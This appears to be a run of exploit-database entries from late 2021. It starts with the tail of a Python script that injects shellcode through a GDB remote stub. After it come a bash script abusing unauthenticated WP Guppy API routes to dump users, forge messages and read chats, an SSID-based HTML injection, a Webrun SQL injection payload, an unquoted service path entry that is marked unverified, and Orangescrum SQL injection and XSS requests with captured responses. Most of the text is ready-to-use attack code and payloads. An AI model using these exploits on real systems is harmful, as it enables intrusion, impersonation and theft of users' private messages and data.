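    hex_length = f'{len(payload) // 2:x}'
    print('[+] Sending payload')
    send(sock, f'M{addr},{hex_length}:{payload}')
    send(sock, 'vCont;c')


def main():
    """Parse argv, read the shellcode file, connect and run exploit()."""
    if len(sys.argv) < 3:
        print(help)
        sys.exit(1)
    ip, port = sys.argv[1].split(':')
    file = sys.argv[2]
    try:
        with open(file, 'rb') as f:
            payload = f.read().hex()
    except FileNotFoundError:
        print(f'[!] ERROR: File {file} not found')
        sys.exit(1)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((ip, int(port)))
        print('[+] Connected to target. Preparing exploit')
        exploit(sock, payload)
        print('[*] Pwned!! Check your listener')


if __name__ == '__main__':
    main()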
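#!/bin/bash
# Exploit Title: Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure
# Exploit Author: Keyvan Hardani
# Date: 22/11/2021
# Vendor Homepage: https://wp-guppy.com/
# Version: up to 1.1
# Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2
# Usage ./exploit.sh -h
#
# The three REST routes below are requested with no cookie and no nonce,
# which is the disclosure: list all users, send a message as any userId,
# and read the chat between two users.
# (The shebang has been moved to line 1 — it is only honoured there; the
# original placed the header comments above it.)

Help() {
    # Display Help
    echo "Usage"
    echo
    echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure"
    echo
    echo "Option 1: Get all users ( ./exploit.sh 1 domain.com )"
    echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1507 1493 ) => arg3 = receiverId, arg4 = userId (the sender)"
    echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493 ) => arg3 = receiverId, arg4 = userId"
    echo "-h Print this Help."
    echo
}

while getopts ":h" option; do
    case $option in
        h) # display Help
            Help
            exit;;
    esac
done

# Every positional parameter is quoted: the original `[ $1 == 1 ]` aborted
# with "unary operator expected" when no mode was given.
mode="${1:-}"
host="${2:-}"
if [ -z "$mode" ] || [ -z "$host" ]; then
    Help
    exit 1
fi

case "$mode" in
    1)
        curl -s --url "https://$host/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python3 -m json.tool
        ;;
    2)
        # $3 = receiverId, $4 = userId (the impersonated sender); the original
        # help text had these the other way round from the request it sends.
        curl -s -X POST --url "https://$host/wp-json/guppy/v2/send-guppy-message" \
            --data '{"receiverId":"'"$3"'","userId":"'"$4"'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' \
            -H 'Content-Type: application/json' | python3 -m json.tool
        ;;
    3)
        curl -s --url "https://$host/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python3 -m json.tool
        ;;
    *)
        Help
        exit 1
        ;;
esac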

FLEX 1085 Web 1.6.0 - HTML Injection

# Exploit Title: FLEX 1085 Web 1.6.0 - HTML Injection # Date: 2021-11-21 # Exploit Author: Mr Empy # Vendor Homepage: https://www.tem.ind.br/ # Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94 # Version: 1.6.0 # Tested on: Android Title: ================ FLEX 1085 Web - HTML Injection Summary: ================ The FLEX 1085 Web appliance is vulnerable to an HTML injection attack: the SSID of a nearby Wi-Fi network is rendered unescaped in the device's web dashboard, so anyone within radio range can inject arbitrary HTML into the administrator's view without any credentials. Severity Level: ================ 5.3 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Vulnerability Disclosure Schedule: ============================ * October 19, 2021: An email was sent to support at 6:08 PM. * November 20, 2021: No response from support. * November 21, 2021: Vulnerability Disclosure Affected Product: ================ FLEX 1085 Web v1.6.0 Steps to Reproduce: ================ 1. Open your browser and navigate to your device's IP address (http://<IP>). 2. Log in to the device's dashboard and go to "WiFi". 3. On another device that can act as an access point, create a Wi-Fi network named <h1>HTML Injection</h1> (without the quotes) and activate the access point. (https://prnt.sc/20e4y88) 4. Go back to the FLEX device's dashboard and rescan for Wi-Fi networks: the new network is listed as "HTML Injection" rendered in bold at heading size, i.e. the <h1> tag was interpreted as markup. (http://prnt.sc/20e51li)

Webrun 3.6.0.42 - 'P_0' SQL Injection

# Exploit Title: Webrun 3.6.0.42 - 'P_0' SQL Injection # Google Dork: intitle:"Webrun 3.6.0.42" # Date: 23/11/2021 # Exploit Author: Vinicius Alves # Vendor Homepage: https://softwell.com.br/ # Version: 3.6.0.42 # Tested on: Kali Linux 2021.3 # CVE: CVE-2021-43650 =-=-=-= Description =-=-=-= Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0 parameter used to set the username during the login process. =-=-=-= Exploiting =-=-=-= In the post request, change the P_0 value to the following payload: 121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd You will see some information like below: interactionError('ERRO: sintaxe de entrada é inválida para tipo numeric: \"qvvxq1qbzbq\"', null, null, null, '<b> =-=-=-= POC =-=-=-= If the return has the value 'qvvxq1qbzbq', you will be able to successfully exploit this. See an example of the complete POST parameter: action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd

HTTPDebuggerPro 9.11 - Unquoted Service Path

# Exploit Title: HTTPDebuggerPro 9.11 - Unquoted Service Path # Exploit Author: Aryan Chehreghani # Date: 23/11/2021 # Vendor Homepage: https://www.httpdebugger.com # Software Link: https://www.httpdebugger.com/download.html # Version: 9.11 # Tested on: Windows 10 x64 SERVICE_NAME: HTTPDebuggerPro TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerSvc.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HTTP Debugger Pro DEPENDENCIES : SERVICE_START_NAME : LocalSystem Reviewer note: the `sc qc` output reproduced above shows BINARY_PATH_NAME wrapped in double quotes, so as listed it does not demonstrate an unquoted path. An unquoted-service-path finding needs (a) the path to appear without quotes (e.g. `wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """`) and (b) a low-privileged user with write access to one of the intermediate directories such as C:\ or "C:\Program Files (x86)\" (check with icacls). Without both, the auto-start LocalSystem service is not exploitable this way; re-verify before relying on this entry.

orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)

# Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated) # Date: 28/11/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.orangescrum.org/ # Software Link: https://www.orangescrum.org/ # Version: 1.8.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### SQL Injection # Authenticated user ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example vuln parameters: * project_id * old_project_id * uuid * uniqid * projid * id * caseno ----------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------- ## Example ----------------------------------------------------------------------------------------------------------------------- Req old_project_id=1' - error ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/move_task_to_project HTTP/1.1 Origin: http://127.0.0.1 Content-Length: 64 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin Host: 127.0.0.1:80 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Connection: close X-Requested-With: XMLHttpRequest Sec-Fetch-Mode: cors Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; 
COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2 Referer: http://127.0.0.1/orangescrum/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Fetch-Dest: empty project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 500 Internal Server Error Date: Sun, 28 Nov 2021 12:42:30 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; 
path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Content-Length: 132182 Vary: User-Agent Expires: access 12 month Connection: close [...] ----------------------------------------------------------------------------------------------------------------------- Req old_project_id=1'' - not error ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/move_task_to_project HTTP/1.1 Origin: http://127.0.0.1 Content-Length: 66 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin Host: 127.0.0.1:80 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Connection: close X-Requested-With: XMLHttpRequest Sec-Fetch-Mode: cors Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2 Referer: http://127.0.0.1/orangescrum/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Fetch-Dest: empty 
project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0 ----------------------------------------------------------------------------------------------------------------------- Res ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 12:51:23 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Vary: User-Agent Expires: access 12 month Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 0
# Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated) # Date: 28/11/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.orangescrum.org/ # Software Link: https://www.orangescrum.org/ # Version: 1.8.0 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 (note: the captured responses below carry "Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40", so the traces were taken on a different stack than the one listed here) ### XSS Reflected # Authenticated user (a valid session cookie is required; the endpoints are AJAX POST handlers) ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example XSS Reflected Param: projid (the value is echoed unencoded into the onclick attribute of the Save button in the response below, so a double quote closes the attribute, ">" closes the button tag and the injected <script> element is rendered) ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/edit_reply HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 64 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/orangescrum/dashboard Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin id=5&reply_flag=1&projid=1zxcvczxzxcv"><script>alert(1)</script> 
----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 13:28:57 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1 Content-Length: 1114 Vary: User-Agent Expires: access 12 month Connection: close Content-Type: text/html; charset=UTF-8 <table cellpadding="0" cellspacing="0" class="edit_rep_768 col-lg-12"> <tr> <td> <textarea name="edit_reply_txtbox5" id="edit_reply_txtbox5" rows="3" class="reply_txt_ipad col-lg-12"> xczcxz"/><b>bb</b>bbxczcxz"/>&ltxczcxz"/><b>bb</b>bb;b>bb</b>bbxczcxz"/><b>bb</b>bb </textarea> </td> </tr> <tr> <td align="right"> <div id="edit_btn5" class="fr"> <button type="button" value="Save" style="margin:5px;padding:3px 32px 3px 32px;" class="btn btn_blue" onclick="save_editedvalue_reply(2,5,1zxcvczxzxcv"><script>alert(1)</script>,'c64271510399996f611739b [...] 
## Example XSS Stored (the payload is saved with the task and, as the JSON response below shows, echoed back unencoded in the emailTitle / emailMsg fields) Example vulnerable parameters: * CS_message * name * data[User][email] ----------------------------------------------------------------------------------------------------------------------- Param: CS_message ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/ajaxpostcase HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 393 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/orangescrum/dashboard/?project=3966c2c5cc3745d161640d07450d682c Cookie: language=en-gb; currency=USD; CAKEPHP=j27a7es1lv1ln77gpngicqshe4; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; CURRENT_FILTER=cases; TASK_TYPE_IN_DASHBOARD=1; LAST_CREATED_PROJ=14 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin pid=14&CS_project_id=8f4adc0f496a3738f04d629be909488d&CS_istype=2&CS_title=&CS_type_id=15&CS_priority=1&CS_message=zxcvbzz"/><img%20src=x%20onmouseover=alert(1)>axcbv&CS_assign_to=1&CS_due_date=&CS_milestone=&postdata=Post&pagename=dashboard&emailUser%5B%5D=1&CS_id=2678&CS_case_no=1&datatype=1&CS_legend=2&prelegend=1&hours=0&estimated_hours=0&completed=0&taskid=0&task_uid=0&editRemovedFile= 
----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 13:51:29 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Vary: User-Agent Expires: access 12 month Content-Length: 698 Connection: close Content-Type: text/html; charset=UTF-8 {"success":"success","pagename":"dashboard","formdata":"8f4adc0f496a3738f04d629be909488d","postParam":"Post","caseUniqId":"eb8671bf1e20702b7793b11152e9ff32","format":2,"allfiles":null,"caseNo":"1","emailTitle":"aaaaaaaaaaaaaaz\"\/><img src=x onmouseover=alert(1)>a","emailMsg":"zxcvbzz\"\/><img src=x onmouseover=alert(1)> [...]